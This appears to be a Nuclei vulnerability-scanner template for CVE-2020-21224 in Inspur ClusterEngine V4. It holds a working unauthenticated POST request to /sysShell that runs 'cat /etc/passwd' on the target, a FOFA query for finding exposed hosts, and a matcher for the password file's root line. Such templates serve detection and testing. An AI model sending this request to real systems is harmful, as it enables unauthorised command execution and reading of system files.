49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: inspur-clusterengine-rce
|
|
|
|
info:
|
|
name: Inspur Clusterengine V4 SYSshell - Remote Command Execution
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: Inspur Clusterengine V4 SYSshell was found and allows remote command execution by design.
|
|
reference:
|
|
- https://www.inspursystems.com/
|
|
- https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-21224
|
|
- https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-21224
|
|
cwe-id: CWE-88
|
|
cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: title="TSCEV4.0"
|
|
product: clusterengine
|
|
vendor: inspur
|
|
tags: inspur,clusterengine,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /sysShell HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
|
Cookie: lang=cn
|
|
|
|
op=doPlease&node=cu01&command=cat+/etc/passwd
|
|
|
|
redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402201b4b7ae666e11dd746069e0a74fd33c1580132810a91ed036c1133f1bb7279c102207fbb9f61ab601e1df7e115e1dc7a37f119d1395dc781f5563bd4067ca764a697:922c64590222798bb761d5b6d8e72950 |